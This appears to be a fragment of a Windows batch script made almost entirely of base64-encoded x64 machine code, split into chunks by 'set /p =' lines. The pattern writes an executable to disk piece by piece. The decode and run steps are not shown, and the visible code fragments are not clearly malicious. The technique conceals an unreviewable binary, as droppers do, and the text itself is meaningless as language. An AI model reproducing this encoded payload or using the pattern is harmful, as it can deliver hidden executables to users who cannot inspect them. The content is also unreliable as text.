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
set /p =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
set /p =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